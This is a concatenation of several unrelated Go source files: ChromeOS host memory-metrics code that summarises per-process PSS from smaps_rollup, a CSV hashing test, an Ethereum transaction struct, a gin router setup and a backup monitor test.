}, { // The Chrome browser is the only chrome without a --type argument.
commandRE: regexp.MustCompile(`^/opt/google/chrome/chrome`),
name: "chrome_browser",
}, {
commandRE: regexp.MustCompile(`.*`),
name: "other",
},
}
// GetHostMetrics parses smaps and smaps_rollup information from every
// running process on the ChromeOS (host) side.
// Values are summarized according to the processCategories defined above and
// returned in the HostSummary structure.
// If outdir is provided, detailed rollup information is also written
// to files in that directory.
func GetHostMetrics(ctx context.Context, outdir, suffix string) (*HostSummary, error) {
processes, err := process.Processes()
if err != nil {
return nil, errors.Wrap(err, "failed to get all processes")
}
sharedInfoMap, err := makeSharedInfoMap(ctx, processes)
if err != nil {
return nil, err
}
summary := &HostSummary{CategoryMetrics: make(NameToCategoryMetricsMap)}
rollups, err := smapsRollups(ctx, processes, sharedInfoMap, summary)
if err != nil {
return nil, err
}
meminfo, err := kernelmeter.ReadMemInfo()
if err != nil {
return nil, err
}
if len(outdir) > 0 {
// Dump intermediate data.
rollupsJSON, err := json.MarshalIndent(rollups, "", " ")
if err != nil {
return nil, errors.Wrap(err, "failed to convert smaps_rollups to JSON")
}
filename := fmt.Sprintf("smaps_rollup%s.json", suffix)
if err := ioutil.WriteFile(path.Join(outdir, filename), rollupsJSON, 0644); err != nil {
return nil, errors.Wrapf(err, "failed to write smaps_rollups to %s", filename)
}
}
// Convert reported totals in bytes into the common KiB unit.
summary.MemTotal = uint64(meminfo["MemTotal"]) / KiB
summary.MemFree = uint64(meminfo["MemFree"]) / KiB
summary.HostCachedKernel = uint64(meminfo["SReclaimable"]+meminfo["Buffers"]+meminfo["Cached"]-meminfo["Mapped"]) / KiB
metrics := summary.CategoryMetrics // Shallow copy, as it is a map.
for _, rollup := range rollups {
for _, category := range processCategories {
if category.commandRE.MatchString(rollup.Command) {
metric := metrics[category.name]
if metric == nil {
// This is the first time seeing this category, so add it as zeroes.
metric = &CategoryHostMetrics{}
metrics[category.name] = metric
}
pss, ok := rollup.Rollup["Pss"]
if !ok {
return nil, errors.Errorf("smaps_rollup for process %d does not include Pss", rollup.Pid)
}
swapPss, ok := rollup.Rollup["SwapPss"]
if !ok {
return nil, errors.Errorf("smaps_rollup for process %d does not include SwapPss", rollup.Pid)
}
metric.Pss += pss
metric.PssSwap += swapPss
if rollup.Shared != nil {
metric.PssSwap += rollup.Shared.SharedSwapPss
metric.PssGuest += rollup.Shared.CrosvmGuestPss
}
// Only the first matching category should contain this process.
break
}
}
}
return summary, nil
}
// ReportHostMetrics outputs a set of representative metrics
// into the supplied performance data dictionary.
func ReportHostMetrics(summary *HostSummary, p *perf.Values, suffix string) {
for name, value := range summary.CategoryMetrics {
p.Set(
perf.Metric{
Name: fmt.Sprintf("%s%s_pss", name, suffix),
Unit: "MiB",
Direction: perf.SmallerIsBetter,
},
float64(value.Pss)/KiBInMiB,
)
p.Set(
perf.Metric{
Name: fmt.Sprintf("%s%s_pss_swap", name, suffix),
Unit: "MiB",
Direction: perf.SmallerIsBetter,
},
float64(value.PssSwap)/KiBInMiB,
)
p.Set(
perf.Metric{
Name: fmt.Sprintf("%s%s_pss_total", name, suffix),
Unit: "MiB",
Direction: perf.SmallerIsBetter,
},
float64(value.Pss+value.PssSwap)/KiBInMiB,
)
}
}
|
package hashy
import (
"fmt"
"testing"
)
var config = Options{
// Input: "./_/short.csv",
// Input: "./_/long.csv",
// Input: "./_/no_valid.csv",
Input: "./_/1gb.csv",
KeyColumns: []int{1},
SkipHeader: false,
Delimiter: ',',
IncludeKeysValues: false,
}
func TestFile(t *testing.T) {
hash, err := File(config)
if err != nil {
fmt.Println("(!) csv file error:", err)
}
fmt.Println("total:", len(hash))
for key, val := range hash {
fmt.Println(key)
for _, f := range val {
fmt.Println("\t", fmt.Sprintf("%q", f))
}
break
}
}
func TestFileFlat(t *testing.T) {
hash, err := FileFlat(config)
if err != nil {
fmt.Println("(!) csv file error:", err)
}
fmt.Println("total:", len(hash))
for key, val := range hash {
fmt.Println(key, ":", val)
break
}
}
// -benchmem
func BenchmarkModuleName(b *testing.B) {
for i := 0; i < b.N; i++ {
File(config)
}
}
|
package entity
type Log struct {
Topics []string `json:"topic"`
Data []byte `json:"data"`
}
type Transaction struct {
BlockHash string `json:"blockHash"`
BlockNumber string `json:"blockNumber"`
Gas string `json:"gas"`
GasPrice string `json:"gasPrice"`
Hash string `json:"hash"`
Input string `json:"input"`
Nonce string `json:"nonce"`
R string `json:"r"`
S string `json:"s"`
From string `json:"from"`
To string `json:"to"`
TransactionIndex string `json:"transactionIndex"`
Type string `json:"type"`
V string `json:"v"`
Value string `json:"value"`
OriginTransaction interface{} `json:"-"`
Success bool `json:"Success"`
Logs []*Log `json:"Logs"`
}
|
package utils
import (
"github.com/gin-gonic/gin"
"github.com/life-assistant-go/middleware"
)
// Router global use
var Router *gin.Engine
func init() {
// release mode
// gin.SetMode(gin.ReleaseMode)
r := gin.New()
r.Use(middleware.Logger())
Router = r
}
|
package fs_backup_test
import (
"github.com/stretchr/testify/require"
"github.com/zucchinidev/fs_backup"
"strings"
"testing"
)
var archiver *TestArchiver
func TestMonitor(t *testing.T) {
archiver = &TestArchiver{}
monitor := &fs_backup.Monitor{
Destination: "test/archive",
Paths: map[string]string{
"test/hash1": "abc",
"test/hash2": "def",
},
Archiver: archiver,
}
numOfCompressedFiles, err := monitor.Now()
require.NoError(t, err)
require.Equal(t, 2, numOfCompressedFiles)
require.Equal(t, 2, len(archiver.Archives))
for _, call := range archiver.Archives {
require.True(t, strings.HasPrefix(call.Dest, monitor.Destination))
require.True(t, strings.HasSuffix(call.Dest, ".zip"))
}
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.